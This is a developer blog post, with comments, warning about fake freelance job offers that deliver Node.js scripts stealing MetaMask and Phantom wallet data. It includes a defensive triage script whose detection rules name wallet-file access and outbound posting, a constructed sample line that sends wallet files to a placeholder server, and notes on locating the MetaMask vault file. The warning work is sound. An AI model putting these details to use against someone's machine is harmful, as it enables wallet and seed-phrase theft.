DEV Community

Block Experts

Every Blockchain Developer Must Know About This Scam!

🚨 Warning for Freelance Blockchain Developers: Beware of a New Scam!

Freelance developers, especially those working on blockchain and cryptocurrency projects, need to be vigilant about a new scam spreading across popular freelancing platforms. This scam involves a malicious Node.js script that scans a user’s storage and exfiltrates sensitive data, including browser wallet caches from extensions like Phantom and MetaMask.

I got these offers personally from LinkedIn and Freelancer.com.


🛑 How the Scam Works

  1. Fake Job Offer:

    • The scam begins when a "client" contacts a developer on platforms like LinkedIn, Upwork, or Fiverr with a seemingly legitimate job offer.
  2. Malicious Code Delivery:

    • After some discussions, the scammer provides a JavaScript or Node.js script for the developer to integrate into their project.
  3. Hidden Malicious Payload:

    • The script contains hidden code that:
      • Scans Local Storage: Looks for files or caches from browser wallet extensions like Phantom and MetaMask.
      • Extracts Sensitive Data: Gathers private keys, wallet addresses, or other critical information.
      • Exfiltrates the Data: Sends the stolen information to a remote server controlled by the scammer.

💥 The Impact

This scam is particularly dangerous because it targets developers who often work with sensitive financial data. By compromising a developer’s local environment, the scammer gains access to:

  • Cryptocurrency wallets.
  • Login credentials.
  • Other critical information stored on the system.

For developers using browser wallet extensions like Phantom and MetaMask, the consequences can be severe. Losing access to these wallets often results in substantial financial losses.


🛡️ How to Protect Yourself

Take these precautions to avoid falling victim to this scam:

  1. Thoroughly Review Client Requests:

    • Scrutinize any code provided by clients, especially if it accesses or manipulates local storage.
    • If you don’t fully understand the code, seek advice from peers or use online resources to verify its legitimacy.
  2. Use Sandboxed Environments:

    • Run untrusted code in a sandboxed environment or a virtual machine to prevent it from accessing your main system’s storage.
  3. Implement Security Best Practices:

    • Stay informed about the latest security threats targeting developers by following cybersecurity blogs, forums, and news outlets.
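
One way to do the review step above before running anything, as an added example that is not from the original post: a small Node.js triage script that flags lines in client-supplied code touching wallet data, the user profile, local files, the network, or dynamic code. The rule patterns and the sample input are assumptions constructed for illustration.

```javascript
// Added example: static triage of client-supplied JavaScript. Nothing is executed.
// RULES is an illustrative assumption, not a complete detector.
const RULES = [
  { id: 'wallet-storage', re: /metamask|phantom|\.ldb\b/i,
    why: 'references browser wallet extension data' },
  { id: 'profile-path', re: /os\.homedir\(\)|process\.env\.(HOME|APPDATA|LOCALAPPDATA|USERPROFILE)\b/,
    why: 'locates the user profile directory' },
  { id: 'fs-read', re: /readdirSync|readdir\(|readFileSync|createReadStream/,
    why: 'enumerates or reads local files' },
  { id: 'network-out', re: /require\(['"](https?|axios|node-fetch|request)['"]\)|\bfetch\(/,
    why: 'can send data to a remote server' },
  { id: 'dynamic-code', re: /\beval\(|new Function\(|child_process|['"]base64['"]|\batob\(/,
    why: 'runs or decodes code at runtime' },
];
const MAX_LINE = 500; // very long lines often hide minified or obfuscated code

// Return one finding per rule hit, with file name and 1-based line number.
function scanSource(file, text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    if (line.length > MAX_LINE)
      findings.push({ file, line: i + 1, id: 'long-line', why: 'unusually long line' });
    for (const r of RULES)
      if (r.re.test(line)) findings.push({ file, line: i + 1, id: r.id, why: r.why });
  });
  return findings;
}

// 'no-indicators' means none of these rules fired, not that the code is safe.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  if (ids.has('wallet-storage')) return 'wallet-access';
  if (ids.has('fs-read') && ids.has('network-out')) return 'review';
  if (ids.has('dynamic-code') || ids.has('long-line')) return 'review';
  return 'no-indicators';
}

// Constructed, non-functional sample of the pattern described in the post.
const SAMPLE = [
  "const express = require('express');",
  "const dir = path.join(os.homedir(), '<profile>', 'MetaMask');",
  "for (const f of fs.readdirSync(dir)) queue.push(f);",
  "require('axios').post(SERVER, queue);",
].join('\n');

const hits = scanSource('client-task.js', SAMPLE);
hits.forEach((h) => console.log(`${h.file}:${h.line} [${h.id}] ${h.why}`));
console.log('verdict:', verdict(hits));
```

Feed it the text of each delivered file (read as data, never imported) and read every flagged line by hand; a clean result only means these particular patterns were absent.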

📊 What the Hacker Gets

Here’s an example of the kind of data a hacker can extract:

Image description

In the MetaMask folder, for example (see the image above), you’ll find a file named 000005.ldb or something similar. The exact number may vary, but it should be a low numerical value, such as 000004 or 000005. If the number is significantly higher, it is not the vault.

The hacker could decrypt that file if you’re not using a strong encryption password, potentially gaining access to your seed phrase—and as a result, you could lose your funds.

🔒 Conclusion

Do not run untrusted scripts on your main OS. Always use a virtual machine or Docker container with limited permissions to test potentially malicious code.

By staying vigilant and adopting secure practices, you can safeguard yourself and your projects from these scams. Stay safe! 🚀


Top comments (2)

Mark Santiago

Thanks for sharing this valuable article.
Yeah, you are right.
Nowadays there is a rise of scam projects on Upwork, Freelancer, and LinkedIn.
They camouflage themselves as an HR manager or CEO, give you GitHub or GitLab projects (mostly GitLab), and say it's part of the hiring process.
They wanted to run the project locally and record videos.
In their code, especially backend code, there is an external API call to access all the files on drive C.
They were trying to find secret keys or passwords, something like that.
So we need to be aware of that.
In that sense, I think this article will be valuable for us.
Thanks again.

Steven

I have also faced the same scammers.
Thanks for sharing the article.